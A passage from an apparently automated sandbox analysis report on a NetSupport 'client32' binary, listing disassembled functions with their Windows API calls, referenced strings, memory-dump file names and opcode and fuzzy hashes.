                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                                                    Strings
                                                                                                                                                    • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenwvsprintf
                                                                                                                                                    • String ID: Error %d Opening regkey %s
                                                                                                                                                    • API String ID: 1772833024-3994271378
                                                                                                                                                    • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                                    • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                                                                    • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                                    • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                                                                    Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                                                    Strings
                                                                                                                                                    • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Closewvsprintf
                                                                                                                                                    • String ID: Error %d closing regkey %x
                                                                                                                                                    • API String ID: 843752472-892920262
                                                                                                                                                    • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                                    • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                                                                                    • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                                    • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                                                                                    Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,02E6B850,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                                                                                      • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                                                                    • String ID: NSMTRACE
                                                                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                                                                    • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                                                                    • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                                                                                    • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                                                                    • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                                                                                    Function 6CA84F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,6CA88DC8), ref: 6CA84F78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: psapi.dll
                                                                                                                                                    • API String ID: 1029625771-80456845
                                                                                                                                                    • Opcode ID: 6f04d9182a66cf670745a9bcdb868c243e301c4059560a16be80fd8ebb6d3a34
                                                                                                                                                    • Instruction ID: 41be6b52bb404a859ee517f6f4167e4430874b45a0f81b8c1c430da07aa341c8
                                                                                                                                                    • Opcode Fuzzy Hash: 6f04d9182a66cf670745a9bcdb868c243e301c4059560a16be80fd8ebb6d3a34
                                                                                                                                                    • Instruction Fuzzy Hash: 13E001B1A01B118F83B0CF3AA504642BAF0BB086503118E2E90AEC3A00E330AA858F90
                                                                                                                                                    Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: psapi.dll
                                                                                                                                                    • API String ID: 1029625771-80456845
                                                                                                                                                    • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                                                                    • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                                                                                    • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                                                                    • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                                                                                    Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: nslsp.dll
                                                                                                                                                    • API String ID: 1029625771-3933918195
                                                                                                                                                    • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                                                    • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                                                                                    • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                                                    • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                                                                                    Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 110750EF
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1654520187-0
                                                                                                                                                    • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                                                                    • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                                                                                    • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                                                                    • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                                                                                    Function 6CA85C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ioctlsocket.WSOCK32(935334B3,4004667F,00000000,-000397EB), ref: 6CA85D1F
                                                                                                                                                    • select.WSOCK32(00000001,?,00000000,?,00000000,935334B3,4004667F,00000000,-000397EB), ref: 6CA85D62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ioctlsocketselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1457273030-0
                                                                                                                                                    • Opcode ID: 1fd7969afed725e80ce2029ea9298727c180068e3e744874c565cda21f2a9fb2
                                                                                                                                                    • Instruction ID: 8ae1053217584a821d034c745da89eadc71e9e56b402b095ef44b4970b253ebb
                                                                                                                                                    • Opcode Fuzzy Hash: 1fd7969afed725e80ce2029ea9298727c180068e3e744874c565cda21f2a9fb2
                                                                                                                                                    • Instruction Fuzzy Hash: 51213070A012189BEB28CF58C9587EDB7B9EF48304F0081DAA90E97681DB745FD9DF90
                                                                                                                                                    Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 110608C3
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1338273076-0
                                                                                                                                                    • Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                                                                                                    • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                                                                                    • Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                                                                                                    • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                                                                                    Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1183979061-0
                                                                                                                                                    • Opcode ID: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                                                                                                    • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                                                                                    • Opcode Fuzzy Hash: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                                                                                                    • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                                                                                    Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 110886DF
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
